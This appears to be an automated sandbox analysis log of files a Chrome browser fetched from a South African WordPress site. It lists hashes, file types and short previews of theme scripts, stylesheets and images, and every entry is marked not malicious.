                                                                                                                      Preview:!function(t,e,a){"use strict";var n,i,s=t(e),r=t("body"),o=t("#slide-out-widget-area"),l=t("#slide-out-widget-area-bg"),d=t("#header-outer"),c=t("#header-secondary-outer"),h=t("#header-outer #search-btn a"),u=t("#wpadminbar"),p=t("#ajax-loading-screen"),f=t(".body-border-top"),g=t("#page-header-bg"),m=t("#footer-outer"),v=t(".body-border-right").length>0?t(".body-border-right").width():0,b=d.is("[data-logo-height]")?parseInt(d.attr("data-logo-height")):30,w=d.is("[data-padding]")?parseInt(d.attr("data-padding")):28,y=d.is("[data-shrink-num]")?d.attr("data-shrink-num"):6,_=!!d.is('[data-condense="true"]'),C=!!d.is('[data-using-logo="1"]'),x=!!d.is('[data-header-resize="1"]'),k=!!d.is('[data-transparent-header="true"]'),$=(d.is('[data-mobile-fixed="1"]'),r.is("[data-header-format]")?r.attr("data-header-format"):"default"),T=r.is("[data-hhun]")?r.attr("data-hhun"):"",I=r.is("[data-cae]")&&"swing"!==r.attr("data-cae")?r.attr("data-cae"):"easeOutCubic",E=r.is("[data-cad]")?r.attr("data-cad"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8574
                                                                                                                      Entropy (8bit):7.578950072742075
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:7Ptaj4/xyIyu66FmIvaVrFuWBZxtRvk/wsh:7M0/xyTmRUbZHVk5h
                                                                                                                      MD5:345489913CAC925AD0512BEF28246AA0
                                                                                                                      SHA1:9717051206BA4A3168918EF4D50EF93C9BA519F1
                                                                                                                      SHA-256:871EC5A0BCAD2CB8B01FC8F7AF80C5CC7ED55994A16E771EC3DF9FBAD9EF542A
                                                                                                                      SHA-512:FB5381073E14A7C5DDE5267027ED1FFA048AB5950682201136923386F192A68272DB45386EBDEF2FD0F70D3EF5B517D3E5D386694BFA501311C910609068E714
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................:...B......!|............................................................................................................................................J.J.........................................................................................P!1.. 02.@."3.`B#45$.......................!1..AQq."Pa...2Rb.. 0.Br#3.@....`..C$.................. .!.P.@`.a0..."....................!1A.QaqP.... 0.@.`..................@...................................................................................................................................................................................................@...TtP.g...).............[......,=................q.).<.p.e.j|...4.A2.H............ML..."...>8.G.u{........................8.5<...7Yvi<.^u.y.[.zV?CeF..............x....F.u}WAm..^...Wx............._.....N..^................f.........{...H.........................................(...*.K.......e..uT.............=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10278
                                                                                                                      Entropy (8bit):7.691920272029696
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CxX2tCSt7ViA9+5vB+ctshCOHsIv7OV3ec+U8ERuI3JurNiK2d/:CYtHc1B+GO9Hso0p8UR3JSiK2d/
                                                                                                                      MD5:E30EE5C14A201C9B0059482AACF52324
                                                                                                                      SHA1:120FF6758987C22C3A4F8573C8596945C06E9C4A
                                                                                                                      SHA-256:FD2AC031B667487899F9ECC253AB87AEDA471AC227EE2A2702F49146191CEF59
                                                                                                                      SHA-512:8DFA76D07A0EF5284BF85B3EA990982F56480159B62C9202649F11BBE8A1933F8E46B595F332F241EC039C6CF498C152695A9F8BDDBEABF0E26F3DF042123177
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/marine-water.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................u...m...w..($............................................................................................................................................J.J.........................................................................................1...0!.4.5P."2 @A#%.63......................!1.A...Qaq."0.....2Rr.#4PB.3...s ..bc..................!.. @P.0`....................!1AQ.aq...0.. @P...................................................................................................................................................................................................................................................G...R.............9.s)@.}?Gh.[@..............=........V................k.._..e.;..fX.o..>K...XP..........5.}/._..2....3,c.&.c.s..........Lv.>.+n...........f.r.e.3-.z........x.tf|{............Z....e.v..{_.......x.....~]f~._O*n.8~.]...........dz..^.._..E./.......6...G....$...|...?.{G..O
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1933)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2245
                                                                                                                      Entropy (8bit):5.165575698403949
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:u0ldgE01d01a3TSHJcdDjSAKRSkEwznxTqGXkSySfJbpGzHWSWlYQRTCtmP6RPcy:tGp3TPaALkDzxsEH6RPcRbo
                                                                                                                      MD5:507093401CD1D74603963E9A93012460
                                                                                                                      SHA1:40920E71E0DC7B172C80AC5905F9A9C42AA8ACF0
                                                                                                                      SHA-256:86A156B80C4342D46AA6BFDF42944E34CD85F5935E38C20BD58445006CA12A96
                                                                                                                      SHA-512:954AA6351D223570B9E8E22CF329C2020D114D0DA46FC5D62109FBDAB4DE4F29FD14BF56FC7C831BB65609FD2120DD198990B3C47034D0EA5D1B1F3540E4DD1D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.9
                                                                                                                      Preview:/*!. * hoverIntent v1.9.0 // 2017.09.01 // jQuery v1.7.0+. * http://briancherne.github.io/jquery-hoverIntent/. *. * You may use hoverIntent under the terms of the MIT license. Basically that. * means you are free to use hoverIntent as long as this header is left intact.. * Copyright 2007-2017 Brian Cherne. */.!function(factory){"use strict";"function"==typeof define&&define.amd?define(["jquery"],factory):jQuery&&!jQuery.fn.hoverIntent&&factory(jQuery)}(function($){"use strict";var cX,cY,_cfg={interval:100,sensitivity:6,timeout:0},INSTANCE_COUNT=0,track=function(ev){cX=ev.pageX,cY=ev.pageY},compare=function(ev,$el,s,cfg){if(Math.sqrt((s.pX-cX)*(s.pX-cX)+(s.pY-cY)*(s.pY-cY))<cfg.sensitivity)return $el.off(s.event,track),delete s.timeoutId,s.isActive=!0,ev.pageX=cX,ev.pageY=cY,delete s.pX,delete s.pY,cfg.over.apply($el[0],[ev]);s.pX=cX,s.pY=cY,s.timeoutId=setTimeout(function(){compare(ev,$el,s,cfg)},cfg.interval)},delay=function(ev,$el,s,out){return delete $el.data("hoverIntent")[s.id],ou
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3
                                                                                                                      Entropy (8bit):1.584962500721156
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:P:P
                                                                                                                      MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                      SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                      SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                      SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                                                                                      Preview:{}.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9298
                                                                                                                      Entropy (8bit):7.9550983829848825
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:z7EAh+ASL9ww3b15OVc2cq1o0QZQUs4J0dLjN4kMMXL:HlS9wQp+7t1o0Avs/dLB4+L
                                                                                                                      MD5:9182BAEEF0717A153E9A5BA8F8D1F262
                                                                                                                      SHA1:73EC57D617560E5382E0B1224132A58560ABFE7C
                                                                                                                      SHA-256:DEFEFC073CEA8BFEC290D2B541D44C873DA961CBB3F6A5F91C9C940F21C45F1D
                                                                                                                      SHA-512:40FF64D90FF8C63323ED71FF68483036591F746AEC8A974B6778D512291DDB8B4D95C7F3F5F5093CD209D7DB52FF9D546C43B0188558F1F382EDF60E82374CB1
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.............L\....$.IDATx..}..]Uu.Zk.s...........C......"8.*j..[..Z..j...V.Z....... *" ...)$...@.H s.p.s..k....//...._.].U...{.^.5.w..@..G....uj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..d...0T.R.l.{..._._.....7..>O.K.,W...C.R.k*"..:...@.N...7......h`.F ....... `v.4.d.1.c.A0.\w..&.......q.....:.~...1......9...P. V.`MC. ............`j`b...Q..@....l..3.~...b...&$!.dK../....J 0....AC...A."..!...B......?...v/.N..=K....0.aQ...q.j`!`...9....t...QyF{.o..)`P.......`.&...........T..`@.9...Vq.i.^..w<.z5..%,@.)k...P.-....Q...d.).2..v..]..7.-X..+Ub....I..co.vr.=.l...]d......LU.9ht.M.2a.y.r5..hD....'x.J....d....3....D.C..o][...E...W...Y*.........r.(.J!......py..RP+Ua8......>s..X.b+J...$.d.Y.".{.d.. g...n&.(EJ.>}..?.......LK..2$..k..2.(1q.........)....4b"l..k......J+....7.r.7n.......a....,.rD...!.([j..gz.^..*AO....MI,......H.....m.;... . (.l.....;.`."...._..sW.0Y~..u..q.P..4..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):17949
                                                                                                                      Entropy (8bit):7.871055604476079
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:YQG7w9nyr1+/sIKMl76n+KmBbMj+U1plFKRrJW4b6xu1gznkx3:YQG6yZGYMl+F4DWBst6ygzkx3
                                                                                                                      MD5:147F1ECCFA54C25917A02E6290B0AB86
                                                                                                                      SHA1:A438158B36C23748E1C449449AFB3AC41C474ABF
                                                                                                                      SHA-256:DE636A8C0B771C42668904627B1E37617F98573962E7102A068FBE3E0028B1F0
                                                                                                                      SHA-512:3FE47F0550FD7232300139092CC2E5F02A09D61CAFDF5D5FA89E5DDF6A8BB709C7FCC8BB5839CEB45ADF98EF333493B55E6B40BE621E74CE131D77BA13650A18
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/print-audit.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................z..0...F.............................................................................................................................................J.J........................................................................................!...@1 0..P."2#$A`B%534.......................!.1A...Qaq."2.4...BRr#3.@...s0b...P.5...S$C....................!. @P10Qap..`.A"q......................!1A.Qaq.....@...0P. ................@....................................................................................................................................$......f^.l..v.j..H............?a../.N~..1..u..mq'...u.B............%_....V.....{..Y..Y.....z''.a^............ipi...Z...T.......m..n.V......v....A.6..............9V^...vj..I.&..}..o...>^....>..[..6.:..........y..Q...S.....<t.lzY.....J...<..8..b....0.........^..j.{...z:.......h.K9....q}.oC.........'.s..Q.............a..u6...a......:.;.9.8.Y..t..t..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9889
                                                                                                                      Entropy (8bit):7.705292156928488
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ffZPEH/D6Rx7Al6b5RZ21WHr42G4NXXSLjoIJ:fxa/DKil6bE1grnhXesIJ
                                                                                                                      MD5:BB4C2C8475806358DE7D7E0299E5BE26
                                                                                                                      SHA1:CA3746D6EE9B24D7BCDEAB6430B106F38E66E63C
                                                                                                                      SHA-256:9117E3F733BC1CC3A775563182E6B2756B29269EE48415228E69023D3DA828F2
                                                                                                                      SHA-512:BC83CEA1999C046D6FFDB0FD823FF70BD11838DDBB501C4FAF52626704641A46E61C40DF9837001722F5D7EB37B61E6EB0610730613A56F07822CAB8520E3132
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................A......&.............................................................................................................................................J.J...................................................................................... @...2.0.4P.!1".#........................@!1Q.. Aq.."2B0a...R.#3Pbr...cs....................!..0@P`1a .pqA."....................1!AQ. @aq....0..P.....................................................................................................................................'.6......s'.....@...........??X.[..>.....,.=K.o...]...g?>...........k.9..O..x..e..[.[.....O/.7:} ...........k..t.W....lYn6...i.:.O{?>.........<.t....ad.,.=Kb.q.,.,...0...O.............?....2...-.-.....-.......`.........??...t.,.=Kb.q.,.,...b.l_..^....^.9............{..[...e...[._Qe.q.,./.........2.......8....3.Kc./...I..C..p..1~.r.....Ww)....{CC...[/.....8........p...d....e.=n.g.....>_[....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (55374), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):55374
                                                                                                                      Entropy (8bit):4.97253641254998
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:BveIMkY9GYBTzn11oeJ5Y2Y8iLNui5/LAkVNsoTTbJLx/iUjaGoiN6ePkAdmAsPw:EoevStX0kVNfrP6ePkAdmAsP5E+r96
                                                                                                                      MD5:C6AA8E14E7BE50FF8465584042C6795E
                                                                                                                      SHA1:FF34D2F7139A8885B84A57DCBACE2B0B6E460C84
                                                                                                                      SHA-256:AAA862185468BF1D112FEC374E466929C0EF7FA9F6332F10630D1F8BA295708F
                                                                                                                      SHA-512:4C61FE18B8B7CE5B857DA09D848F4C38829804A0F9D38BB1CF3134A0C05C2AD9A01CE3696A480922A3B30C2A3FA79DD0E8A967FC099237B0D8033FA5817A7545
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/skin-material.css?ver=15.0.6
                                                                                                                      Preview:p{padding-bottom:1.5em}.material .wpb_content_element,.material .wpb_row{margin-bottom:1.5em}.wp-block-quote.is-large,.wp-block-quote.is-style-large{margin-bottom:1.5rem}.material .vc_row-fluid[data-column-margin=none]{margin-bottom:0}#header-space{background-color:#fff}body[data-header-color=dark] #header-space{background-color:#000}#sidebar .widget.widget_categories li,#sidebar .widget.widget_nav_menu li,#sidebar .widget.widget_pages li,#sidebar div ul li{border:none;padding:4px 0}.material #footer-outer #footer-widgets .col ul li{padding:4px 0!important;border:none}@media only screen and (min-width:1000px){body #footer-outer .row{padding:75px 0}}#page-header-wrap,.container-wrap,.material .vc_text_separator div,.ocm-effect-wrap,.page-header-no-bg,.page-template-template-portfolio-php .portfolio-items .col.span_3,.page-template-template-portfolio-php .portfolio-items .col.span_4,.portfolio-items .col,.project-title{background-color:#fff}#call-to-action .triangle{color:#fff}#footer-ou
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2320)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2392
                                                                                                                      Entropy (8bit):5.115603596289524
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:qua9/SHQZqr5hp4RB667CGA9Ah8KG98sbfEPEUGrUZzrUJoDrFquYyYWjYPIIbFl:1g/urbY6GijazArEcP7uMVwI1ebYR9
                                                                                                                      MD5:56BA0CDB72B1B00226A21FE08251054A
                                                                                                                      SHA1:82BEF20F71EB674C7D1D63242C80AFBC1E6D8274
                                                                                                                      SHA-256:15A71D32B340BF3641581AC5B4F37887B9CB3981477D5886EC5849749C8A36E7
                                                                                                                      SHA-512:6F33BBC08A61FF3FBFD3533F16355F7C804F2C151496DA3FF0BC14939E7BAA44CA7DA56BC93FB555AFD59E1ACE12BEB8DECCF3E3FA208AE66D66B8D4F40BA718
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1.3
                                                                                                                      Preview:/*.* jQuery Easing v1.4.1 - http://gsgd.co.uk/sandbox/jquery/easing/.*/.!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?module.exports=n(require("jquery")):n(jQuery)}(function(n){function e(n){var e=7.5625,t=2.75;return n<1/t?e*n*n:n<2/t?e*(n-=1.5/t)*n+.75:n<2.5/t?e*(n-=2.25/t)*n+.9375:e*(n-=2.625/t)*n+.984375}void 0!==n.easing&&(n.easing.jswing=n.easing.swing);var t=Math.pow,u=Math.sqrt,r=Math.sin,i=Math.cos,a=Math.PI,o=1.70158,c=1.525*o,s=2*a/3,f=2*a/4.5;return n.extend(n.easing,{def:"easeOutQuad",swing:function(e){return n.easing[n.easing.def](e)},easeInQuad:function(n){return n*n},easeOutQuad:function(n){return 1-(1-n)*(1-n)},easeInOutQuad:function(n){return n<.5?2*n*n:1-t(-2*n+2,2)/2},easeInCubic:function(n){return n*n*n},easeOutCubic:function(n){return 1-t(1-n,3)},easeInOutCubic:function(n){return n<.5?4*n*n*n:1-t(-2*n+2,3)/2},easeInQuart:function(n){return n*n*n*n},easeOutQuar
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2620)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2711
                                                                                                                      Entropy (8bit):5.221876664182422
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:NbBSHLadoNsotDykhwy5irSUdhw7SUKYE4R1ZOlxOcHyOqCpi4tGErM7eeqxPNke:VBdGDh2uYxOcHyOqCg4z4E3
                                                                                                                      MD5:2A651F118ED794F9BDC86EF7EB86859A
                                                                                                                      SHA1:044DAF3A8F2789D7B80948DCF640BB72775F9DF0
                                                                                                                      SHA-256:C962E74A0CD768609B29C247028BD61C3229A50BB3ABE908FEEAA98962EB0971
                                                                                                                      SHA-512:29A20F42BA55BCDE7849AA21B8A26BE89D0911CF480197557FD53C12566AB076BA56C34B789ADA36B41B679B0E5017EA2F845F767DCD0041C0F5AB1C9BB616D1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?ver=3.1.13
                                                                                                                      Preview:/*!. * jQuery Mousewheel 3.1.13. * Copyright OpenJS Foundation and other contributors. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(u){var f,d,e=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],t="onwheel"in window.document||9<=window.document.documentMode?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],w=Array.prototype.slice;if(u.event.fixHooks)for(var i=e.length;i;)u.event.fixHooks[e[--i]]=u.event.mouseHooks;var c=u.event.special.mousewheel={version:"3.1.12",setup:function(){if(this.addEventListener)for(var e=t.length;e;)this.addEventListener(t[--e],n,{passive:false});else this.onmousewheel=n;u.data(this,"mousewheel-line-height",c.getLineHeight(this)),u.data(this,"mousewheel-page-height",c.getPageHeight(this))},teardown:function(){if(this.removeEventListener)for(var e=t.length;e;)this.removeEventListener(t[--e],n,!1);else this.onmousewheel=null;u.removeData(this,"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12828
                                                                                                                      Entropy (8bit):7.779036612952333
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:qmChBD+ehI2+ES/zjcJv7x0iwmGNNNvjsz9W4eE05kvNhm67rK9HtiXxhWR:ABD7I/0vOi4rLlEeozrK92PWR
                                                                                                                      MD5:C75476DDF49EA771B82395363CA33595
                                                                                                                      SHA1:4973035F432B4EFE10EE5786A7EF7FB9FF6D0AE5
                                                                                                                      SHA-256:9CE876833C8A1FA2E5300851BE1C168ED92E71ADFF37540AE1E10D28C0B221ED
                                                                                                                      SHA-512:2DC50D2F9148E62E0B46CA52891B879854F7FFEA78F1D18268721C3D7DBC5DAEF3CA22219150D65D9115BECD3EDF9B2C5FCC195AC69D61ED98CEC5A263B249AD
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................&......#...2.............................................................................................................................................J.J.......................................................................................@.0..!1. 2...3P4"%5.......................!1AQ..@q."2a....Rr.#3.0..B. .b..CS.P..cs..................!@0P`.... pa.....................!1Aa.@Qq..... 0....P....................................................................................................................................^..b.L......}|.9%b.9^................L..].O..z...9}|...xd....<..V....S............4k.u+...Kl..c.s..@.......g.....................=LH.!.P............=.....2............7\e..?.|.2......#e.3........`........3.\8.a..7.x........,._.B)....@.........hej.;.0.........._..{..S........^..|...v............Z./.z........J.}.C'^....$................[i.......e..=<........=|...@...f...q.d.........
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1880), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1880
                                                                                                                      Entropy (8bit):5.054751433371674
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:BgrtH6pSqr1h7gM10kKgMZKQhCrgp2OBqLlN:EH6pSq09qlN
                                                                                                                      MD5:ABE6B3B54FB492863DECB8525994CC02
                                                                                                                      SHA1:D99473157436C3D671CEB8BCF1C55DE9DDFEFCF6
                                                                                                                      SHA-256:A9C8CBCF0ED23E3EC2F71ACC45D2C4836A1DD995CCE5630964063C7A44B40283
                                                                                                                      SHA-512:C80B1399125339B5447297372B84AC6821339DC3395D008EF288C8ED13F58EB61094B9F211CD0B0228C4FD6CAEF4D107C2EF88E94319D65A87F9BE531BEDA713
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/priority.js?ver=15.0.6
                                                                                                                      Preview:var headerEl=document.getElementById("header-outer"),headerSpaceEl=document.getElementById("header-space");void 0!==headerEl&&null!=headerEl&&void 0!==headerSpaceEl&&null!=headerSpaceEl&&headerSpaceEl.hasAttribute("data-secondary-header-display")&&(headerSpaceEl.style.height=headerEl.clientHeight+"px"),jQuery(function(e){"use strict";var t,a,r,n,o,d,i=!1;function h(){var a=t.offset().top;e("#page-header-wrap.fullscreen-header").css("height","auto"),t.css("height",parseInt(window.innerHeight)-parseInt(a)+"px")}if(navigator.userAgent.match(/(Android|iPod|iPhone|iPad|BlackBerry|IEMobile|Opera Mini)/)&&(i=!0),i&&e("#page-header-bg.fullscreen-header").length>0){t=e("#page-header-bg"),h();var l=window.innerWidth,s=window.innerHeight;e(window).resize(function(){e(window).width()!=l&&e(window).height!=s&&(h(),l=window.innerWidth,s=window.innerHeight)})}i&&e(".nectar_fullscreen_zoom_recent_projects").length>0&&(a=e(".body-border-top").length>0&&e(window).width()>1e3?e(".body-border-top").height
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5666
                                                                                                                      Entropy (8bit):7.169926753608612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:SfosneG5nKZ405GMQyMs/8tHOH3iaDD/QQ0huv3jxIdSqFKIqHeK:SQYemh05nQ88k/DDoQ0hS+E0K9eK
                                                                                                                      MD5:F86B566370792EE3C742DC86FC4A4C6A
                                                                                                                      SHA1:FA026ABC15AE94D7DA41F9A10B88AE3FD1C7DD99
                                                                                                                      SHA-256:2801177A24F6AB2F719705F8EE4AD78A2B3278DE300EA2602A36B2E001E31B2A
                                                                                                                      SHA-512:D300233402AAFB183EE1A964324F0AA7FF527C66CA5509309EC2E3A771559861F8E4EE967BC6A30B430C779D0F96DF608C823E3ECB60F03F9E5FED460EB36818
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.................... ....... ............................................................................................................................................J.J.........................................................................................P.2...134. 05!.......................!1.AQaq."2r.3 0...B...P.Rs...#...................1.P..q......................!1Q..Aaq. P......0.@...................................................................................................................................................................................................................................................................................................D....}..t...............K....*.~=dq....x.6...=........c.'.....K....*.~=dq....x.iHW.&y^w....<.9.3..5.3..>~W.......zd.E..k.^.z..i...<...p...(P..l.2.3..(..`.<L...-.....Y.q@...;.:...#...|..1J.<.=.2..8.C.>vQ....k....>~}.........-~y....i.Tv....>|}....l.gQ.y
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (47886)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):95021
                                                                                                                      Entropy (8bit):4.916564849815238
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:ccaFIf4gkA5SOV+sQ354NThtf0J6BZ9NuZr9:ccaFskA5SOV+sQ354NThV0cBZ9NuZr9
                                                                                                                      MD5:EAE67119698A4C352712DD5C50E64C50
                                                                                                                      SHA1:D0AB021F361A68AAC49A202E642262626421E2C1
                                                                                                                      SHA-256:B041E7B08A99E947327A5FAF96E5AB7AEEF39A467C0EF2240710A19857743DA3
                                                                                                                      SHA-512:6342F92CD28820862FF55D631EC2956F864F6F16CCA836AA160CD0129C42F35BB9BE088565994695E31A019AF0DAB77A80F2FE6F2CDADC4B4D40556ACF2807DB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/css/dist/block-library/style.min.css?ver=6.1.7
                                                                                                                      Preview:@charset "UTF-8";.wp-block-archives-dropdown label{display:block}.wp-block-avatar{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button__link{cursor:pointer;display:inline-block;text-align:center;word-break:break-word;box-sizing:border-box}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){box-shadow:none;text-decoration:none;border-radius:9999px;padding:calc(.667em + 2px) calc(1.333em + 2px)}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.w
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):12828
                                                                                                                      Entropy (8bit):7.779036612952333
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:qmChBD+ehI2+ES/zjcJv7x0iwmGNNNvjsz9W4eE05kvNhm67rK9HtiXxhWR:ABD7I/0vOi4rLlEeozrK92PWR
                                                                                                                      MD5:C75476DDF49EA771B82395363CA33595
                                                                                                                      SHA1:4973035F432B4EFE10EE5786A7EF7FB9FF6D0AE5
                                                                                                                      SHA-256:9CE876833C8A1FA2E5300851BE1C168ED92E71ADFF37540AE1E10D28C0B221ED
                                                                                                                      SHA-512:2DC50D2F9148E62E0B46CA52891B879854F7FFEA78F1D18268721C3D7DBC5DAEF3CA22219150D65D9115BECD3EDF9B2C5FCC195AC69D61ED98CEC5A263B249AD
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/dell.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................&......#...2.............................................................................................................................................J.J.......................................................................................@.0..!1. 2...3P4"%5.......................!1AQ..@q."2a....Rr.#3.0..B. .b..CS.P..cs..................!@0P`.... pa.....................!1Aa.@Qq..... 0....P....................................................................................................................................^..b.L......}|.9%b.9^................L..].O..z...9}|...xd....<..V....S............4k.u+...Kl..c.s..@.......g.....................=LH.!.P............=.....2............7\e..?.|.2......#e.3........`........3.\8.a..7.x........,._.B)....@.........hej.;.0.........._..{..S........^..|...v............Z./.z........J.}.C'^....$................[i.......e..=<........=|...@...f...q.d.........
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11281
                                                                                                                      Entropy (8bit):7.7195729238893005
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:MG9ReMcZFFUQKUQRggjNEzhK5veQcU2Z3Lc/F0gHnvoQD/80KbYe/LO0kihm0h:MJMoFyQNQWgxEtK5vlcUq3LYHnvokdQP
                                                                                                                      MD5:0E44832C8AA1DDC84B71B964CD0AC8B9
                                                                                                                      SHA1:3A23D196C3C75328C8E1177F047DCA5E87BCD0F9
                                                                                                                      SHA-256:07ABAAF186A0A3F4868AC6C27D6FEC04257339FD377847440FB46FBBCEACC783
